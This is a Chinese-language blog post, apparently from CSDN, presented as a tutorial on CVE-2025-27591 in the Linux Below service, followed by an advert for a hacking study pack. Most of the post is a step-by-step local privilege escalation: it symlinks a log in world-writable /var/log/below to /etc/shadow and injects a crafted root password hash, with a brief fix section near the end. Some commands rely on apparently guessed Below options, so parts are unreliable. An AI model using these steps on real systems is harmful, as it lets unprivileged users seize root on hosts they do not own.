Linux提权漏洞CVE-2025-27591,从零基础到精通,收藏这篇就够了!

各位攻城狮、程序猿们,今天咱们来聊点刺激的!Linux 提权漏洞 CVE-2025-27591,听说过没?没听过?没关系,今天就带你把它扒个精光!这个漏洞存在于 Below 服务(版本低于 v0.9.0),简单来说,就是因为 /var/log/below 这个目录太奔放了,权限设置成了全局可写,导致任何阿猫阿狗都能往里塞东西。这就好比你家大门钥匙人手一把,想不进贼都难啊!

漏洞是怎么被“玩”坏的?(漏洞利用原理)

这漏洞的利用原理,说白了就是“狸猫换太子”!

  1. “敞篷”目录: /var/log/below 权限 777,谁都能写,简直就是黑客的游乐场!
  2. 乾坤大挪移(符号链接攻击): 攻击者搞个障眼法,用符号链接把日志文件指向 /etc/shadow 这个关键文件。/etc/shadow 可是存放用户密码哈希的地方,一旦被篡改,那还不是想进就进?
  3. 一键 root: Below 服务以 root 权限运行,写入日志的时候,实际上是在修改 /etc/shadow。攻击者通过覆盖或修改 /etc/shadow,设置一个自己知道的密码,就能轻松拿到 root 权限,直接起飞!

想“白嫖” root 权限?先看看你有没有这些“船票”(前提条件)

想利用这个漏洞,也不是随便就能上的,你需要满足以下几个条件:

  • 目标系统得是 Below 的“老弱病残”版本: 也就是 Below 版本低于 v0.9.0。
  • 你得先混进目标系统: 至少得有个本地非特权用户的账号。
  • “犯罪现场”得是开放的: /var/log/below 目录必须是全局可写的。你可以用 ls -ld /var/log/below 检查一下,如果输出结果是 drwxrwxrwx,那就恭喜你,机会来了!

“白嫖” root 权限的骚操作(基本利用步骤)

有了“船票”,接下来就是表演真正的技术了!

  1. 确认“犯罪现场”: 运行 ls -ld /var/log/below,看看是不是显示 drwxrwxrwx
  2. 障眼法: 创建符号链接:ln -s /etc/shadow /var/log/below/attack.log
  3. 引蛇出洞: 想办法让 Below 服务往 attack.log 里面写东西,比如:below some_command 2>/var/log/below/attack.log
  4. 验证成果: 如果 /etc/shadow 被修改了,用你设置的新密码登录 su - 试试,是不是直接就进去了?

“白嫖”姿势大放送(方法 1:利用日志输出)

如果 Below 服务支持将输入或调试信息写入日志文件,那事情就简单多了!

  1. 制造“毒药”(密码哈希):mkpasswd -m sha-512 "newpassword" 生成一个密码哈希。 示例输出: $6$randomsalt$hashedpassword。 然后构造一个完整的 /etc/shadow 条目:root:$6$randomsalt$hashedpassword:19448::::::
  2. 继续障眼法: ln -sf /etc/shadow /var/log/below/attack.log
  3. 投毒: 想办法让 Below 服务把你的“毒药”写进去。比如,如果 Below 支持调试模式并回显输入:below --debug "root:$6$randomsalt$hashedpassword:19448::::::" 2>/var/log/below/attack.log
  4. 验收成果: 运行 grep "$hashedpassword" /etc/shadow && echo "成功!尝试密码 'newpassword'" 看看是不是成功了!

“曲线救国”大法(方法 2:分步注入)

如果没办法一次性写入完整的 /etc/shadow 条目,那就试试分步注入!

  1. 准备“弹药”: echo "root:$6$randomsalt$hashedpassword:19448::::::" > /tmp/payload
  2. “蚂蚁搬家”: 如果 Below 支持日志追加,就用这个方法:below some_command --log-append /tmp/payload 2>>/var/log/below/attack.log
  3. “善后处理”: 如果 /etc/shadow 格式被破坏了,提权之后记得修复一下。

示例脚本(仅供参考,请勿用于非法用途!)

#!/bin/bash
# 这段代码仅供学习交流,请勿用于非法用途!
# ... 脚本内容 ...

如何避免被“白嫖”?(修复方案)

亡羊补牢,犹未为晚!

  • 升级!升级!升级! Below >= v0.9.0 已经修复了这个漏洞,赶紧升级到最新版本!
  • 锁好你家大门: 运行 chmod 700 /var/log/below,把目录权限改了,别让谁都能进!

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************

猜你喜欢

转载自blog.csdn.net/Python_0011/article/details/146822557
今日推荐